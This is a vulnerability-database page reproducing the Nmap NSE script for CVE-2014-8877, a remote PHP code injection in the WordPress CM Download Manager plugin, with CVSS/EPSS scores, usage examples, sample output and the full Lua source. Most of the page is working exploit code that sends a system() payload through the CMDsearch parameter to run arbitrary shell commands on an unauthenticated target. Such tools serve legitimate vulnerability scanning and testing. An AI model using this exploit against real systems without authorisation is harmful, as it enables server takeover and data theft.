Lucene search

Mariusz Ziulek <mzet()owasp org>NMAP:HTTP-VULN-CVE2014-8877.NSE

HistoryNov 11, 2015 - 5:02 p.m.

http-vuln-cve2014-8877 NSE Script

2015-11-1117:02:28

Mariusz Ziulek <mzet()owasp org>

nmap.org

128

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON

Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

CM Download Manager plugin does not correctly sanitise the user input which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP ‘create_function’ function.

The script injects PHP system() function into the vulnerable target in order to execute specified shell command.

Script Arguments

http-vuln-cve2014-8877.cmd

Command to execute. Default: nil

http-vuln-cve2014-8877.uri

Wordpress root directory on the website. Default: /

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

vulns.short, vulns.showall

See the documentation for the vulns library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" &lt;target&gt;
nmap --script http-vuln-cve2014-8877 &lt;target&gt;

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877

Requires

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local url = require "url"
local vulns = require "vulns"
local base64 = require "base64"
local rand = require "rand"

description = [[
Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM
Download Manager plugin. Versions <= 2.0.0 are known to be affected.

CM Download Manager plugin does not correctly sanitise the user input which
allows remote attackers to execute arbitrary PHP code via the CMDsearch
parameter to cmdownloads/, which is processed by the PHP 'create_function'
function.

The script injects PHP system() function into the vulnerable target in order to
execute specified shell command.
]]

---
-- @usage
-- nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
-- nmap --script http-vuln-cve2014-8877 <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2014-8877:
-- |   VULNERABLE:
-- |   Code Injection in Wordpress CM Download Manager plugin
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-8877
-- |       CM Download Manager plugin does not correctly sanitise the user input
-- |       which allows remote attackers to execute arbitrary PHP code via the
-- |       CMDsearch parameter to cmdownloads/, which is processed by the PHP
-- |       'create_function' function.
-- |
-- |     Disclosure date: 2014-11-14
-- |     Exploit results:
-- |       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
-- |     References:
-- |_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877
--
-- @args http-vuln-cve2014-8877.uri Wordpress root directory on the website. Default: /
-- @args http-vuln-cve2014-8877.cmd Command to execute. Default: nil
---

author = "Mariusz Ziulek <mzet()owasp org>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}

portrule = shortport.http

function genHttpReq(host, port, uri, cmd)
  local rnd = nil
  local payload = nil
  local vulnPath = '/cmdownloads/?CMDsearch='

  if cmd ~= nil then
    payload = '".system("'..cmd..'")."'
  else
    rnd = rand.random_alpha(15)
    local encRnd = base64.enc(rnd)
    payload = '".base64_decode("'..encRnd..'")."'
  end

  local finalUri = uri..vulnPath..url.escape(payload)
  local req = http.get(host, port, finalUri)

  stdnse.debug(1, ("Sending GET '%s%s%s' request"):format(uri, vulnPath, payload))

  if not(rnd) then
    return req
  else
    return req, rnd
  end
end

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil

  local rnd = nil
  local req, rnd = genHttpReq(host, port, uri, nil)

  -- check if target is vulnerable
  if req.status == 200 and string.match(req.body, rnd) ~= nil then
    local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
    local vuln = {
      title = 'Code Injection in Wordpress CM Download Manager plugin',
      state = vulns.STATE.NOT_VULN,
      description = [[
CM Download Manager plugin does not correctly sanitise the user input
which allows remote attackers to execute arbitrary PHP code via the
CMDsearch parameter to cmdownloads/, which is processed by the PHP
'create_function' function.
      ]],
      IDS = {CVE = 'CVE-2014-8877'},
      references = {
          'www.securityfocus.com/bid/71204/'
      },
      dates = {
          disclosure = {year = '2014', month = '11', day = '14'},
      },
    }
    stdnse.debug(1, string.format("Random string '%s' was found in the body response. Host seems to be vulnerable.", rnd))
    vuln.state = vulns.STATE.EXPLOIT

    -- exploit the vulnerability
    if cmd ~= nil then
       -- wrap cmd with pattern which is used to filter out only relevant output from the response
       local pattern = rand.random_alpha(5)
       req = genHttpReq(host, port, uri, 'echo '..pattern..';'..cmd..';echo '..pattern..';')

       if req.status == 200 then
         -- take first lazy match as command output
         local cmdOut = nil
         for m in string.gmatch(req.body, pattern..'\n(.-)\n'..pattern) do
           cmdOut = m
           break
         end

         if cmdOut ~= nil then
           vuln.exploit_results = cmdOut
         end
       end
    end

    return vulnReport:make_output(vuln)
  end
end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON

Related for NMAP:HTTP-VULN-CVE2014-8877.NSE

nmap199